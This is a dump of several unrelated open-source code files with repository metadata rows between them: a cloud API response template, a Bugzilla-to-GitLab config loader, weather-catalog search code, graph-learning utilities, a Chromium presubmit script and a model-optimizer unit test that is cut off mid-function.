<transitGatewayId>{{ transit_gateway_peering_attachment.requester_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</requesterTgwInfo>
<status>{{ transit_gateway_peering_attachment.status.code }}</status>
<tagSet>
{% for tag in transit_gateway_peering_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_peering_attachment.id }}</transitGatewayAttachmentId>
</transitGatewayPeeringAttachment>
</{{ method_name }}>"""
DESCRIBE_TRANSIT_GATEWAY_PEERING_ATTACHMENTS = """<DescribeTransitGatewayPeeringAttachments xmlns="http://ec2.amazonaws.com/doc/2016-11-15/">
<requestId>bebc9670-0205-4f28-ad89-049c97e46633</requestId>
<transitGatewayPeeringAttachments>
{% for transit_gateway_peering_attachment in transit_gateway_peering_attachments %}
<item>
<createTime>{{ transit_gateway_peering_attachment.create_time }}</createTime>
<state>{{ transit_gateway_peering_attachment.state }}</state>
<accepterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.accepter_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.accepter_tgw_info.region or '' }}</region>
<transitGatewayId>{{ transit_gateway_peering_attachment.accepter_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</accepterTgwInfo>
<requesterTgwInfo>
<ownerId>{{ transit_gateway_peering_attachment.requester_tgw_info.ownerId or '' }}</ownerId>
<region>{{ transit_gateway_peering_attachment.requester_tgw_info.region or '' }}</region>
<transitGatewayId>{{ transit_gateway_peering_attachment.requester_tgw_info.transitGatewayId or '' }}</transitGatewayId>
</requesterTgwInfo>
<status>{{ transit_gateway_peering_attachment.status.code }}</status>
<tagSet>
{% for tag in transit_gateway_peering_attachment.get_tags() %}
<item>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
<transitGatewayAttachmentId>{{ transit_gateway_peering_attachment.id }}</transitGatewayAttachmentId>
</item>
{% endfor %}
</transitGatewayPeeringAttachments>
</DescribeTransitGatewayPeeringAttachments>
"""
| 54.175234
| 141
| 0.689309
|
7fabe5d1eb2cafdd7672953c419bfa18cfc500ce
| 3,705
|
py
|
Python
|
bugzilla2gitlab/config.py
|
abbbi/bugzilla2gitlab
|
254c0ea756fbe479d90df654055ef5dc4085c34a
|
[
"MIT"
] | null | null | null |
bugzilla2gitlab/config.py
|
abbbi/bugzilla2gitlab
|
254c0ea756fbe479d90df654055ef5dc4085c34a
|
[
"MIT"
] | null | null | null |
bugzilla2gitlab/config.py
|
abbbi/bugzilla2gitlab
|
254c0ea756fbe479d90df654055ef5dc4085c34a
|
[
"MIT"
] | null | null | null |
from collections import namedtuple
import os
import yaml
from .utils import _perform_request
Config = namedtuple(
"Config",
[
"gitlab_base_url",
"gitlab_project_id",
"bugzilla_base_url",
"bugzilla_user",
"bugzilla_auto_reporter",
"bugzilla_closed_states",
"default_headers",
"component_mappings",
"bugzilla_users",
"gitlab_users",
"gitlab_misc_user",
"default_gitlab_labels",
"datetime_format_string",
"map_operating_system",
"map_keywords",
"keywords_to_skip",
"map_milestones",
"milestones_to_skip",
"gitlab_milestones",
"dry_run",
"include_bugzilla_link",
"use_bugzilla_id",
"verify",
],
)
def get_config(path):
configuration = {}
configuration.update(_load_defaults(path))
configuration.update(
_load_user_id_cache(
path,
configuration["gitlab_base_url"],
configuration["default_headers"],
configuration["verify"],
)
)
if configuration["map_milestones"]:
configuration.update(
_load_milestone_id_cache(
configuration["gitlab_project_id"],
configuration["gitlab_base_url"],
configuration["default_headers"],
configuration["verify"],
)
)
configuration.update(_load_component_mappings(path))
return Config(**configuration)
def _load_defaults(path):
with open(os.path.join(path, "defaults.yml")) as f:
config = yaml.safe_load(f)
defaults = {}
for key in config:
if key == "gitlab_private_token":
defaults["default_headers"] = {"private-token": config[key]}
else:
defaults[key] = config[key]
return defaults
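# Example defaults.yml (illustrative sketch): it supplies the Config fields
# defined above, except that the token is given as gitlab_private_token (turned
# into default_headers here), bugzilla_users/gitlab_users/component_mappings come
# from other files, and gitlab_milestones is fetched from the API when
# map_milestones is enabled.
#
#   gitlab_base_url: https://gitlab.example.com/api/v4
#   gitlab_project_id: 42
#   gitlab_private_token: <personal access token>
#   bugzilla_base_url: https://bugzilla.example.com
#   bugzilla_user: bugzilla-bot
#   dry_run: true
#   verify: true
#   ... (remaining Config fields follow the same pattern)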
def _load_user_id_cache(path, gitlab_url, gitlab_headers, verify):
"""
Load cache of GitLab usernames and ids
"""
print("Loading user cache...")
with open(os.path.join(path, "user_mappings.yml")) as f:
bugzilla_mapping = yaml.safe_load(f)
gitlab_users = {}
for user in bugzilla_mapping:
gitlab_username = bugzilla_mapping[user]
uid = _get_user_id(gitlab_username, gitlab_url, gitlab_headers, verify=verify)
gitlab_users[gitlab_username] = str(uid)
mappings = {}
# bugzilla_username: gitlab_username
mappings["bugzilla_users"] = bugzilla_mapping
# gitlab_username: gitlab_userid
mappings["gitlab_users"] = gitlab_users
return mappings
def _load_milestone_id_cache(project_id, gitlab_url, gitlab_headers, verify):
"""
Load cache of GitLab milestones and ids
"""
print("Loading milestone cache...")
gitlab_milestones = {}
url = "{}/projects/{}/milestones".format(gitlab_url, project_id)
result = _perform_request(url, "get", headers=gitlab_headers, verify=verify)
if result and isinstance(result, list):
for milestone in result:
gitlab_milestones[milestone["title"]] = milestone["id"]
return {"gitlab_milestones": gitlab_milestones}
def _get_user_id(username, gitlab_url, headers, verify):
url = "{}/users?username={}".format(gitlab_url, username)
result = _perform_request(url, "get", headers=headers, verify=verify)
if result and isinstance(result, list):
return result[0]["id"]
raise Exception("No gitlab account found for user {}".format(username))
def _load_component_mappings(path):
with open(os.path.join(path, "component_mappings.yml")) as f:
component_mappings = yaml.safe_load(f)
return {"component_mappings": component_mappings}
| 28.5
| 86
| 0.645074
|
666976a79191d0453f6afeedda40ddaeb79b83d7
| 148
|
py
|
Python
|
topCoder/srms/200s/srm218/div2/access_level.py
|
gauravsingh58/algo
|
397859a53429e7a585e5f6964ad24146c6261326
|
[
"WTFPL"
] | 1
|
2020-09-30T19:53:08.000Z
|
2020-09-30T19:53:08.000Z
|
topCoder/srms/200s/srm218/div2/access_level.py
|
gauravsingh58/algo
|
397859a53429e7a585e5f6964ad24146c6261326
|
[
"WTFPL"
] | null | null | null |
topCoder/srms/200s/srm218/div2/access_level.py
|
gauravsingh58/algo
|
397859a53429e7a585e5f6964ad24146c6261326
|
[
"WTFPL"
] | 1
|
2020-10-15T09:10:57.000Z
|
2020-10-15T09:10:57.000Z
|
class AccessLevel:
def canAccess(self, rights, minPermission):
return ''.join(map(lambda i: 'A' if i>= minPermission else 'D', rights))
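# Illustrative check: AccessLevel().canAccess([0, 1, 2], 1) == 'DAA', since each
# right below minPermission maps to 'D' and every other right maps to 'A'.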
| 37
| 80
| 0.668919
|
62d40178d4ac42ab1d5da1cbd7cba287dd2476ee
| 353
|
py
|
Python
|
backend/src/infrastructures/database.py
|
Seina88/attendance-system
|
afa7ba64c7fd99623a1c5dd3b09151ade759d715
|
[
"MIT"
] | 2
|
2021-05-12T14:09:44.000Z
|
2021-06-19T12:38:33.000Z
|
backend/src/infrastructures/database.py
|
Seina88/attendance-system
|
afa7ba64c7fd99623a1c5dd3b09151ade759d715
|
[
"MIT"
] | 10
|
2021-05-13T12:09:47.000Z
|
2021-06-07T13:28:17.000Z
|
backend/src/infrastructures/database.py
|
Seina88/attendance-system
|
afa7ba64c7fd99623a1c5dd3b09151ade759d715
|
[
"MIT"
] | 1
|
2021-06-17T00:54:04.000Z
|
2021-06-17T00:54:04.000Z
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
class Database(SQLAlchemy):
def __init__(self) -> None:
super().__init__()
self.migrate = Migrate()
def initialize(self, app: Flask) -> None:
self.init_app(app)
self.migrate.init_app(app, self)
db = Database()
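# Usage sketch (illustrative; SQLALCHEMY_DATABASE_URI is the standard
# Flask-SQLAlchemy setting, and the URI value here is a placeholder):
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///attendance.db"
#   db.initialize(app)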
| 20.764706
| 45
| 0.677054
|
a6b91a1d18734a1d217b1058702945911322dfff
| 6,993
|
py
|
Python
|
Assignment5/src/scripts/catalog_search.py
|
shikashyam/BigDataSystemsCoursework
|
d7f9cabbfb18b0e3303292b65af1ffd530e24ccc
|
[
"MIT"
] | null | null | null |
Assignment5/src/scripts/catalog_search.py
|
shikashyam/BigDataSystemsCoursework
|
d7f9cabbfb18b0e3303292b65af1ffd530e24ccc
|
[
"MIT"
] | null | null | null |
Assignment5/src/scripts/catalog_search.py
|
shikashyam/BigDataSystemsCoursework
|
d7f9cabbfb18b0e3303292b65af1ffd530e24ccc
|
[
"MIT"
] | 4
|
2022-02-12T23:59:54.000Z
|
2022-02-16T22:53:32.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 14:24:15 2022
@author: shshyam
"""
from importlib.resources import path
import h5py
import math
import boto3
from botocore.handlers import disable_signing
from os import walk
import os
import pandas as pd
from geopy import distance
from geopy import Point
import gcsfs
import numpy as np
fs=gcsfs.GCSFileSystem(project="sevir-project-bdia",token="cloud_storage_creds.json")
def searchincache(lat,long,distlimit):
print('In Search cache function')
cache_file=fs.open("gs://sevir-data-2/sevir_cache.csv",'rb')
cache = pd.read_csv(cache_file)
myloc=Point(lat,long)
cache['distance']=cache.apply(lambda row: distancer(row,myloc), axis=1)
cache=cache[cache["distance"] < int(distlimit)]
if cache.empty:
return 'N',None,None,None
else:
cache=cache.sort_values(by='distance')
fileloc=cache.iloc[0]['image_location']
timestamp=cache.iloc[0]['timestamp']
print("Searched and found:",lat,":",long,":",fileloc)
print('LOG : SearchBy : LatLong, Refresh_flag : N, Threshold_time : N/A, Lat :',lat,', Long :', long,', City : N/A, State : N/A, EventID :',float(fileloc.split('.')[0]))
textnarrative='FUNCTIONALITY NOT SET YET'
return 'Y',timestamp,fileloc,textnarrative
def searchgeocoordinates(approxlat,approxlong,distlimit):
print('In search GeoCoordinates function')
catalog = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
catalog=catalog[catalog['event_id'].isna()==False]
catalog=catalog[catalog['pct_missing']!=0]
catalog=catalog[(catalog['file_name']=='vil/2019/SEVIR_VIL_STORMEVENTS_2019_0101_0630.h5') | (catalog['file_name']=='vil/2018/SEVIR_VIL_STORMEVENTS_2018_0101_0630.h5')]
catalog['lat']=(catalog.llcrnrlat+catalog.urcrnrlat)/2
catalog['long']=(catalog.llcrnrlon+catalog.urcrnrlon)/2
myloc=Point(approxlat,approxlong)
catalog['distance']=catalog.apply(lambda row: distancer(row,myloc), axis=1)
catalog=catalog[catalog["distance"] < int(distlimit)]
if catalog.empty:
return None,None,None,None,None,None,None
else:
catalog=catalog.sort_values(by='distance')
lat=catalog.iloc[0]['llcrnrlat']
long=catalog.iloc[0]['llcrnrlon']
event_id=catalog.iloc[0]['event_id']
filename=catalog.iloc[0]['file_name']
fileidx=catalog.iloc[0]['file_index']
eventsummary,episodesummary=findstormdetails(event_id)
# if eventsummary==np.nan:
# eventsummary=''
# if episodesummary==np.nan:
# episodesummary=''
return round(lat,6),round(long,6),event_id,filename,fileidx,eventsummary,episodesummary
def findstormdetails(event_id):
stormdetails_path=fs.open("gs://sevir-data-2/data/storm_details_file.csv",'rb')
stormdetails = pd.read_csv(stormdetails_path)
eventsummary=stormdetails[(stormdetails['EVENT_ID']==event_id)]['EVENT_NARRATIVE'].unique()
episodesummary=stormdetails[(stormdetails['EVENT_ID']==event_id)]['EPISODE_NARRATIVE'].unique()
if((np.size(eventsummary)>0)&(np.size(episodesummary)>0)):
        # comparisons with np.nan via '==' are always False; use pd.isna()
        event_text = '' if pd.isna(eventsummary[0]) else eventsummary[0]
        episode_text = '' if pd.isna(episodesummary[0]) else episodesummary[0]
        return event_text, episode_text
else:
return None,None
def distancer(row,myloc):
coords_1 = myloc
coords_2 = (row['lat'], row['long'])
return distance.distance(coords_1, coords_2).miles
def searchcataloglatlong(lat, long):
print("Inside SearchCatalogLatLong")
event_id,date=get_event_id(lat,long)
if((event_id!='None')):
filename,fileindex,catalog=get_filename_index(event_id)
return filename,fileindex[0]
else:
return None,None
def searchcatalogdatetime(date,time,city,state):
stormdetails_path=fs.open("gs://sevir-data-2/data/storm_details_file.csv",'rb')
stormdetails = pd.read_csv(stormdetails_path)
date=date.replace('-','')
yrmonth=date[0:6]
day=date[6:8]
time=time.replace(':','')
event_id = stormdetails[(stormdetails['BEGIN_YEARMONTH'] == int(yrmonth)) & (stormdetails['BEGIN_DAY']==int(day))& (stormdetails['BEGIN_TIME']==int(time)) & (stormdetails['CZ_NAME']==city)& (stormdetails['STATE']==state)]['EVENT_ID'].unique()
if(np.size(event_id)>0):
filename,fileindex,catalog=get_filename_index(event_id[0])
eventsummary=stormdetails[(stormdetails['EVENT_ID']==event_id[0])]['EVENT_NARRATIVE'].unique()
episodesummary=stormdetails[(stormdetails['EVENT_ID']==event_id[0])]['EPISODE_NARRATIVE'].unique()
if(np.size(fileindex)>0):
return filename,event_id[0],fileindex[0],eventsummary[0],episodesummary[0]
else:
return None,None,None,None,None
else:
return None,None,None,None,None
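# Input format note for searchcatalogdatetime (inferred from the slicing above):
# date is 'YYYY-MM-DD' and time is 'HH:MM', so an illustrative call such as
#   searchcatalogdatetime('2019-04-30', '17:35', 'DALLAS', 'TEXAS')
# is matched against BEGIN_YEARMONTH=201904, BEGIN_DAY=30, BEGIN_TIME=1735.
# The city and state strings here are placeholders for CZ_NAME/STATE values.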
def get_event_id(lat,lon):
print('inside geteventid')
df1 = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
df1= df1.round({'llcrnrlat':6,'llcrnrlon':6})
try:
date = df1[(df1['llcrnrlon']== lon) & ( df1['llcrnrlat']==lat)]['time_utc'].unique()[0]
event_id = df1[(df1['llcrnrlon']== lon) & ( df1['llcrnrlat']==lat)]['event_id'].unique()
except:
print('Lat and long not found')
date= 'None'
event_id = 'None'
if(np.size(event_id)==0):
date='None'
event_id='None'
return event_id,date
def get_filename_index(event_id):
catlog = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
filtered = pd.DataFrame()
filtered = pd.concat([filtered,catlog[(catlog["event_id"] == int(event_id))]])
allfilenames = filtered['file_name'].unique()
vilpd=catlog[(catlog["event_id"] == int(event_id)) & (catlog['img_type']=='vil') & (catlog['pct_missing']!=0)]
filename=vilpd['file_name'].unique()
fileindex = vilpd['file_index'].to_list()
catalog = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
newcatalog=catalog[(catalog['file_name'].isin(allfilenames))]
return filename, fileindex,newcatalog
def download_hf(filename):
resource = boto3.resource('s3')
resource.meta.client.meta.events.register('choose-signer.s3.*', disable_signing)
bucket=resource.Bucket('sevir')
for i in range(len(filename)):
filename1 = "data/" + filename[i]
return filename[i]
def One_Sample_HF(directory,fileindex,filenames):
newfilepath=''
for i in range(len(filenames)):
with h5py.File(directory+filenames[i],'r') as hf:
image_type = filenames[i].split('_')[1]
if image_type == "VIL":
VIL = hf['vil'][int(fileindex[0])]
return "sample"
| 38.213115
| 246
| 0.664951
|
25c89e53d50fb33b43f0e59880085fc54a0dfd86
| 5,041
|
py
|
Python
|
utilities.py
|
dingdanhao110/HINGCN
|
281b73c03bd3b00e35bce4c5e1c27076233555e4
|
[
"MIT"
] | null | null | null |
utilities.py
|
dingdanhao110/HINGCN
|
281b73c03bd3b00e35bce4c5e1c27076233555e4
|
[
"MIT"
] | null | null | null |
utilities.py
|
dingdanhao110/HINGCN
|
281b73c03bd3b00e35bce4c5e1c27076233555e4
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.sparse as sp
import torch
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def read_metapath(path="../data/cora/", dataset="cora", num_mps=1):
"""read metapath file, A1~A2 pairs"""
print('Loading {} dataset...'.format(dataset))
idx_features_labels = np.genfromtxt("{}{}.content".format(path, dataset),
dtype=np.dtype(str))
features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)
features = normalize(features)
features = torch.FloatTensor(np.array(features.todense()))
labels = encode_onehot(idx_features_labels[:, -1])
labels = torch.LongTensor(np.where(labels)[1])
# build graph
idx = np.array(idx_features_labels[:, 0], dtype=np.int32)
idx_map = {j: i for i, j in enumerate(idx)}
adjs = []
for path_idx in range(num_mps):
edges_unordered = np.genfromtxt("{}{}_{}.metapaths".format(path, dataset, path_idx),
dtype=np.int32)
edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),
dtype=np.int32).reshape(edges_unordered.shape)
adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),
shape=(features.shape[0], features.shape[0]),
dtype=np.float32)
# build symmetric adjacency matrix
adj= adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)
adj = normalize(adj + sp.eye(adj.shape[0]))
adj = sparse_mx_to_torch_sparse_tensor(adj)
adjs.append(adj.unsqueeze(0))
adjs = torch.cat(adjs)
idx_train = range(140)
idx_val = range(200, 500)
idx_test = range(500, 1500)
idx_train = torch.LongTensor(idx_train)
idx_val = torch.LongTensor(idx_val)
idx_test = torch.LongTensor(idx_test)
return adjs, features, labels, idx_train, idx_val, idx_test
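# Input format note (inferred from the genfromtxt calls above): each
# "<dataset>_<i>.metapaths" file lists one node-id pair per line, using the same
# ids as the first column of <dataset>.content, e.g.
#   35  1033
#   35  103482
# Every pair becomes one edge of metapath graph i (symmetrized in the loop above).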
def normalize(mx):
"""Row-normalize sparse matrix"""
rowsum = np.array(mx.sum(1))
r_inv = np.power(rowsum, -1).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
mx = r_mat_inv.dot(mx)
return mx
def sparse_mx_to_torch_sparse_tensor(sparse_mx):
"""Convert a scipy sparse matrix to a torch sparse tensor."""
sparse_mx = sparse_mx.tocoo().astype(np.float32)
indices = torch.from_numpy(
np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))
values = torch.from_numpy(sparse_mx.data)
shape = torch.Size(sparse_mx.shape)
return torch.sparse.FloatTensor(indices, values, shape)
def accuracy(output, labels):
preds = output.max(1)[1].type_as(labels)
correct = preds.eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def read_metapath_raw(path="../data/cora/", dataset="cora", num_mps=1):
"""read metapath file, A1,A2,pathsim triples, return adj are not normalized"""
print('Loading {} dataset...'.format(dataset))
idx_features_labels = np.genfromtxt("{}{}.content".format(path, dataset),
dtype=np.dtype(str))
features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)
features = normalize(features)
features = torch.FloatTensor(np.array(features.todense()))
labels = encode_onehot(idx_features_labels[:, -1])
labels = torch.LongTensor(np.where(labels)[1])
# build graph
idx = np.array(idx_features_labels[:, 0], dtype=np.int32)
idx_map = {j: i for i, j in enumerate(idx)}
adjs = []
for path_idx in range(num_mps):
edges_unordered = np.genfromtxt("{}{}_{}.metapaths".format(path, dataset, path_idx),
dtype=np.int32)
edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),
dtype=np.int32).reshape(edges_unordered.shape)
adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),
shape=(features.shape[0], features.shape[0]),
                            dtype=bool)  # np.bool is deprecated in NumPy; the builtin bool is equivalent here
# build symmetric adjacency matrix
adj= adj + adj.T
# adj = (adj + sp.eye(adj.shape[0])) # no normalization
adj = sparse_mx_to_torch_sparse_tensor(adj)
adjs.append(adj)
# adjs.append(adj.unsqueeze(0))
# adjs = torch.cat(adjs)
idx_train = range(140)
idx_val = range(200, 500)
idx_test = range(500, 1500)
idx_train = torch.LongTensor(idx_train)
idx_val = torch.LongTensor(idx_val)
idx_test = torch.LongTensor(idx_test)
return adjs, features, labels, idx_train, idx_val, idx_test
def pathsim(A):
value = []
x,y = A.nonzero()
for i,j in zip(x,y):
value.append(2 * A[i, j] / (A[i, i] + A[j, j]))
return sp.coo_matrix((value,(x,y)))
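# Worked example (illustrative, for an indexable matrix such as a dense array):
#   A = np.array([[2, 1], [1, 3]])
#   pathsim(A) stores 2*A[i,j]/(A[i,i]+A[j,j]) for each nonzero (i, j):
#   (0,0) -> 1.0, (0,1) -> 0.4, (1,0) -> 0.4, (1,1) -> 1.0
# so self-similarity on the diagonal is always 1.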
| 35.251748
| 92
| 0.617933
|
cd3a1b337f47f74f3704e9b7f726067e4dde96e7
| 1,396
|
py
|
Python
|
chrome/tools/build/PRESUBMIT.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 76
|
2020-09-02T03:05:41.000Z
|
2022-03-30T04:40:55.000Z
|
chrome/tools/build/PRESUBMIT.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 45
|
2020-09-02T03:21:37.000Z
|
2022-03-31T22:19:45.000Z
|
chrome/tools/build/PRESUBMIT.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 8
|
2020-07-22T18:49:18.000Z
|
2022-02-08T10:27:16.000Z
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Presubmit script for FILES.cfg controlling which files are archived.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into depot_tools.
"""
USE_PYTHON3 = True
_PLATFORMS = ['android', 'chromeos', 'linux', 'mac', 'win']
def _CheckChange(input_api, output_api):
results = []
affected_files = input_api.change.LocalPaths()
for platform in _PLATFORMS:
files_config_path = input_api.os_path.join(platform, 'FILES.cfg')
for filepath in affected_files:
if filepath.endswith(files_config_path):
output, error = input_api.subprocess.Popen(
['python', files_config_path],
stdout=input_api.subprocess.PIPE,
stderr=input_api.subprocess.PIPE).communicate()
if output or error:
results.append(output_api.PresubmitError(
files_config_path + " syntax error: \n" + output + error))
return results
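# Note on the check above: each platform's FILES.cfg is executed directly with
# `python <platform>/FILES.cfg`, and any stdout or stderr output is reported as a
# syntax error for that file; a clean run produces no output and no error.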
def CheckChangeOnUpload(input_api, output_api):
results = []
results.extend(_CheckChange(input_api, output_api))
return results
def CheckChangeOnCommit(input_api, output_api):
results = []
results.extend(_CheckChange(input_api, output_api))
return results
| 34.9
| 75
| 0.724928
|
cb3dabb438d1901773b85be7fccd37ee3fb9b4e5
| 7,996
|
py
|
Python
|
model-optimizer/extensions/front/interpolate_reshape_test.py
|
Andruxin52rus/openvino
|
d824e371fe7dffb90e6d3d58e4e34adecfce4606
|
[
"Apache-2.0"
] | 2
|
2020-11-18T14:14:06.000Z
|
2020-11-28T04:55:57.000Z
|
model-optimizer/extensions/front/interpolate_reshape_test.py
|
Andruxin52rus/openvino
|
d824e371fe7dffb90e6d3d58e4e34adecfce4606
|
[
"Apache-2.0"
] | 30
|
2020-11-13T11:44:07.000Z
|
2022-02-21T13:03:16.000Z
|
model-optimizer/extensions/front/interpolate_reshape_test.py
|
mmakridi/openvino
|
769bb7709597c14debdaa356dd60c5a78bdfa97e
|
[
"Apache-2.0"
] | 1
|
2020-12-18T15:47:45.000Z
|
2020-12-18T15:47:45.000Z
|
"""
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import numpy as np
from generator import generator, generate
from extensions.front.interpolate_reshape import InterpolateWithConcat
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, regular_op_with_shaped_data, valued_const_with_data, connect, \
connect_data
nodes = {
**regular_op_with_shaped_data('placeholder', [1, 3, 30, 40], {'type': 'Parameter', 'op': 'Parameter'}),
**valued_const_with_data('out_shape', np.array([60, 160])),
**regular_op_with_shaped_data('interpolate', [1, 3, 60, 160],
{'type': 'Interpolate', 'axes': int64_array([2, 3]), 'op': 'Interpolate',
'version': 'opset1'}),
**regular_op_with_shaped_data('identity_00', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('identity_01', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('shape', [4], {'type': 'ShapeOf', 'op': 'ShapeOf'}),
**valued_const_with_data('indices', np.array([2, 3])),
**valued_const_with_data('axis', np.array(0)),
**regular_op_with_shaped_data('gather', [2], {'type': 'Gather', 'op': 'Gather'}),
**regular_op_with_shaped_data('placeholder_1', [1, 3, 60, 160], {'type': 'Parameter', 'op': 'Parameter'}),
**regular_op_with_shaped_data('identity_10', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('identity_11', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('concat', [1, 7, 60, 160], {'type': 'Concat', 'axis': 1, 'op': 'Concat'}),
**valued_const_with_data('N', np.array([1])),
**result('output'),
**result('output_1'),
}
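# What the reference graphs below encode (a reading aid, not part of the tests):
# InterpolateWithConcat is expected to rewire Interpolate's target-size input to
# come from the other Concat input via ShapeOf -> Gather(indices=[2, 3], axis=0)
# instead of the out_shape constant, and to leave the graph untouched in the
# negative cases.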
@generator
class TestInterpolateConcat(unittest.TestCase):
def test_interpolate_concat_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('placeholder_1', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect_data('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_interpolate_identity_concat_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('identity_00', 'identity_01'),
*connect('identity_01', '0:concat'),
*connect('placeholder_1', 'identity_10'),
*connect('identity_10', 'identity_11'),
*connect('identity_11', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect_data('identity_11', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('identity_00', 'identity_01'),
*connect('identity_01', '0:concat'),
*connect('placeholder_1', 'identity_10'),
*connect('identity_10', 'identity_11'),
*connect('identity_11', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_interpolate_concat_negate(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('interpolate', 'identity_01'),
*connect('identity_00', 'output'),
*connect('identity_01', 'output_1'),
], nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('interpolate', 'identity_01'),
*connect('identity_00', 'output'),
*connect('identity_01', 'output_1'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
@generate(*[
{'concat': {'axis': None}},
{'concat': {'axis': -1}},
{'interpolate': {'axes': None}},
{'interpolate': {'axes': np.array([1])}},
{'interpolate': {'axes': np.array([2, -1])}},
])
def test_negative_axes_conditions(self, update_attrs):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], update_attributes=update_attrs, nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
